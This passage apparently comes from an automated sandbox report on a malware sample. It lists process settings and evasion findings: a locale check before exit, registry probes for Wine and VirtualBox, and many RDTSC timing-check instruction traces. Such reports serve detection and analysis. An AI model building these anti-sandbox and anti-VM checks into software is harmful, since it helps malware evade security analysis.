Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\5aa32fec17.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\5aa32fec17.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\5aa32fec17.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 486E1F second address: 486E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F2738B89E18h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 486E3F second address: 486E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2738E98EF8h 0x00000010 jmp 00007F2738E98EEEh 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 486E70 second address: 486E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 486E74 second address: 486E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c js 00007F2738E98EECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4928E8 second address: 4928F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 492D6A second address: 492D74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2738E98EECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 492D74 second address: 492D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2738B89E08h 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 492D87 second address: 492DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F2738E98EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2738E98EF9h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 492DB0 second address: 492DC5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2738B89E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F2738B89E08h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494A38 second address: 494A3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494A3E second address: 494A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2738B89E06h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494A48 second address: 494A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494A4C second address: 494A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007F2738B89E0Ch 0x00000010 push ebx 0x00000011 jnp 00007F2738B89E06h 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push esi 0x0000001e push eax 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop eax 0x00000022 pop esi 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494DC7 second address: 494DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494DCB second address: 494DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494DCF second address: 494DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007F2738E98EF5h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F2738E98EE6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494E55 second address: 494E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494E5A second address: 494E73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2738E98EE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2738E98EEAh 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494E73 second address: 494EA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov dx, 6150h 0x0000000e mov esi, dword ptr [ebp+122D393Fh] 0x00000014 popad 0x00000015 push 00000000h 0x00000017 jmp 00007F2738B89E16h 0x0000001c push B38BDD69h 0x00000021 push esi 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494EA9 second address: 494F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 add dword ptr [esp], 4C742317h 0x0000000d sub edx, 46EC3702h 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F2738E98EE8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D27B0h], ecx 0x00000035 push 00000000h 0x00000037 jl 00007F2738E98EECh 0x0000003d mov dword ptr [ebp+122D3585h], eax 0x00000043 push 00000003h 0x00000045 call 00007F2738E98EF5h 0x0000004a mov dword ptr [ebp+122D266Ah], ecx 0x00000050 pop ecx 0x00000051 call 00007F2738E98EE9h 0x00000056 push esi 0x00000057 push ebx 0x00000058 jnc 00007F2738E98EE6h 0x0000005e pop ebx 0x0000005f pop esi 0x00000060 push eax 0x00000061 jmp 00007F2738E98EF3h 0x00000066 mov eax, dword ptr [esp+04h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F2738E98EF7h 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F54 second address: 494F66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F66 second address: 494F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F77 second address: 494F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F7B second address: 494F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F7F second address: 494FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2738B89E0Bh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jnp 00007F2738B89E06h 0x00000018 pop edi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b movsx ecx, si 0x0000001e mov esi, dword ptr [ebp+122D369Fh] 0x00000024 lea ebx, dword ptr [ebp+1245997Ah] 0x0000002a sub ch, FFFFFFA1h 0x0000002d mov edx, dword ptr [ebp+122D368Bh] 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007F2738B89E0Ah 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494FC8 second address: 494FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B560C second address: 4B5612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3521 second address: 4B3526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3526 second address: 4B352C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B352C second address: 4B3530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B36CA second address: 4B36D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B36D0 second address: 4B3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF7h 0x00000007 jmp 00007F2738E98EF7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3836 second address: 4B383C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B383C second address: 4B3847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3847 second address: 4B384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3AC7 second address: 4B3ACC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3ACC second address: 4B3B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2738B89E1Dh 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F2738B89E15h 0x00000016 jmp 00007F2738B89E12h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3B04 second address: 4B3B09 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40C6 second address: 4B40CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40CB second address: 4B40D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40D1 second address: 4B40D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40D5 second address: 4B40D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B429F second address: 4B42B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B42B2 second address: 4B42B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B42B8 second address: 4B42E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F2738B89E0Ch 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B45E7 second address: 4B45ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B45ED second address: 4B45F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B45F1 second address: 4B45FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A95B0 second address: 4A95DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Fh 0x00000009 je 00007F2738B89E06h 0x0000000f popad 0x00000010 jmp 00007F2738B89E12h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A95DC second address: 4A95F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738E98EEAh 0x00000008 pushad 0x00000009 js 00007F2738E98EE6h 0x0000000f jno 00007F2738E98EE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B471B second address: 4B4721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B4EAA second address: 4B4EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B4EB0 second address: 4B4EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B4EB4 second address: 4B4EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B5035 second address: 4B503B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B540D second address: 4B5424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B5424 second address: 4B542A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B542A second address: 4B542F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4BA69B second address: 4BA69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4BA7B9 second address: 4BA7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47E701 second address: 47E709 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48DA46 second address: 48DA56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2738E98EE6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 483906 second address: 48391B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2738B89E06h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007F2738B89E06h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48391B second address: 483921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3697 second address: 4C369C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C380E second address: 4C3812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3812 second address: 4C381C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
